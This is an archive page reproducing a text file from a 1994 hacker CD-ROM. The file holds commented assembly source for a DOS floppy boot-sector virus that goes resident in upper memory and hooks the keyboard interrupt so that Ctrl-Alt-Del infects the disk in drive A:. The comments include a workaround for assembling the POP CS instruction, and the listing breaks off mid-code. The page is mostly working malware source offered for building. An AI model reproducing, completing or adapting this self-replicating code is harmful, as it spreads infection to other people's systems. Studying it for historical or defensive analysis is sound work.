Hackers Underworld 2: Forbidden Knowledge

home *** CD-ROM | disk | FTP | other *** search

/ Hackers Underworld 2: Forbidden Knowledge / Hackers Underworld 2: Forbidden Knowledge.iso / VIRUS / CPI2_9.TXT < prev next >

Wrap

Text File | 1994-07-17 | 18KB | 388 lines

;[2.9] ;-----------------------------------------------------------------------; ; This virus is of the "FLOPPY ONLY" variety. ; ; It replicates to the boot sector of a floppy disk and when it gains control ; it will move itself to upper memory. It redirects the keyboard ; ; interrupt (INT 09H) to look for ALT-CTRL-DEL sequences at which time ; ; it will attempt to infect any floppy it finds in drive A:. ; ; It keeps the real boot sector at track 39, sector 8, head 0 ; ; It does not map this sector bad in the fat (unlike the Pakistani Brain) ; and should that area be used by a file, the virus ; ; will die. It also contains no anti detection mechanisms as does the ; ; BRAIN virus. It apparently uses head 0, sector 8 and not head 1 ; ; sector 9 because this is common to all floppy formats both single ; ; sided and double sided. It does not contain any malevolent TROJAN ; ; HORSE code. It does appear to contain a count of how many times it ; ; has infected other diskettes although this is harmless and the count ; ; is never accessed. ; ; ; ; Things to note about this virus: ; ; It can not only live through an ALT-CTRL-DEL reboot command, but this ; ; is its primary (only for that matter) means of reproduction to other ; ; floppy diskettes. The only way to remove it from an infected system ; ; is to turn the machine off and reboot an uninfected copy of DOS. ; ; It is even resident when no floppy is booted but BASIC is loaded ; ; instead. Then when ALT-CTRL-DEL is pressed from inside of BASIC, ; ; it activates and infectes the floppy from which the user is ; ; attempting to boot. ; ; ; ; Also note that because of the POP CS command to pass control to ; ; its self in upper memory, this virus does not to work on 80286 ; ; machines (because this is not a valid 80286 instruction). ; ; ; ; If your assembler will not allow the POP CS command to execute, replace; ; the POP CS command with an NOP and then assemble it, then debug that ; ; part of the code and place POP CS in place of NOP at that section. ; ; ; ; The Norton Utilities can be used to identify infected diskettes by ; ; looking at the boot sector and the DOS SYS utility can be used to ; ; remove it (unlike the Pakistani Brain). ; ;-----------------------------------------------------------------------; ; ORG 7C00H ; ; TOS LABEL WORD ;TOP OF STACK ;-----------------------------------------------------------------------; ; 1. Find top of memory and copy ourself up there. (keeping same offset); ; 2. Save a copy of the first 32 interrupt vectors to top of memory too ; ; 3. Redirect int 9 (keyboard) to ourself in top of memory ; ; 4. Jump to ourself at top of memory ; ; 5. Load and execute REAL boot sector from track 40, head 0, sector 8 ; ;-----------------------------------------------------------------------; BEGIN: CLI ;INITIALIZE STACK XOR AX,AX ; MOV SS,AX ; MOV SP,offset TOS ; STI ; ; MOV BX,0040H ;ES = TOP OF MEMORY - (7C00H+512) MOV DS,BX ; MOV AX,[0013H] ; MUL BX ; SUB AX,07E0H ; (7C00H+512)/16 MOV ES,AX ; ; PUSH CS ;DS = CS POP DS ; ; CMP DI,3456H ;IF THE VIRUS IS REBOOTING... JNE B_10 ; DEC Word Ptr [COUNTER_1] ;...LOW&HI:COUNTER_1-- ; B_10: MOV SI,SP ;SP=7C00 ;COPY SELF TO TOP OF MEMORY MOV DI,SI ; MOV CX,512 ; CLD ; REP MOVSB ; ; MOV SI,CX ;CX=0 ;SAVE FIRST 32 INT VETOR ADDRESSES TO MOV DI,offset BEGIN - 128 ; 128 BYTES BELOW OUR HI CODE MOV CX,128 ; REP MOVSB ; ; CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) ; PUSH ES ;ES=HI ; JUMP TO OUR HI CODE WITH POP CS ; PUSH DS ;DS=0 ; ES = DS POP ES ; ; MOV BX,SP ; SP=7C00 ;LOAD REAL BOOT SECTOR TO 0000:7C00 MOV DX,CX ;CX=0 ;DRIVE A: HEAD 0 MOV CX,2708H ; TRACK 40, SECTOR 8 MOV AX,0201H ; READ SECTOR INT 13H ; (common to 8/9 sect. 1/2 sided!) JB $ ; HANG IF ERROR ; JMP JMP_BOOT ;JMP 0000:7C00 ; ;-----------------------------------------------------------------------; ; SAVE THEN REDIRECT INT 9 VECTOR ; ; ; ; ON ENTRY: DS = 0 ; ; ES = WHERE TO SAVE OLD_09 & (HI) ; ; WHERE NEW_09 IS (HI) ; ;-----------------------------------------------------------------------; PUT_NEW_09: ; DEC Word Ptr [0413H] ;TOP OF MEMORY (0040:0013) -= 1024 ; MOV SI,9*4 ;COPY INT 9 VECTOR TO MOV DI,offset OLD_09 ; OLD_09 (IN OUR HI CODE!) MOV CX,0004 ; ; CLI ; REP MOVSB ; MOV Word Ptr [9*4],offset NEW_09 MOV [(9*4)+2],ES ; STI ; ; RET ; ; ;-----------------------------------------------------------------------; ; RESET KEYBOARD, TO ACKNOWLEDGE LAST CHAR ; ;-----------------------------------------------------------------------; ACK_KEYBD: ; IN AL,61H ;RESET KEYBOARD THEN CONTINUE MOV AH,AL ; OR AL,80H ; OUT 61H,AL ; XCHG AL,AH ; OUT 61H,AL ; JMP RBOOT ; ; ;-----------------------------------------------------------------------; ; DATA AREA WHICH IS NOT USED IN THIS VERSION ; ; REASON UNKNOWN ; ;-----------------------------------------------------------------------; TABLE DB 27H,0,1,2 ;FORMAT INFORMATION FOR TRACK 39 DB 27H,0,2,2 ; (CURRENTLY NOT USED) DB 27H,0,3,2 ; DB 27H,0,4,2 ; DB 27H,0,5,2 ; DB 27H,0,6,2 ; DB 27H,0,7,2 ; DB 27H,0,8,2 ; ; ;A7C9A LABEL BYTE ; DW 00024H ;NOT USED DB 0ADH ; DB 07CH ; DB 0A3H ; DW 00026H ; ; ;L7CA1: ; POP CX ;NOT USED POP DI ; POP SI ; POP ES ; POP DS ; POP AX ; POPF ; JMP 1111:1111 ; ; ;-----------------------------------------------------------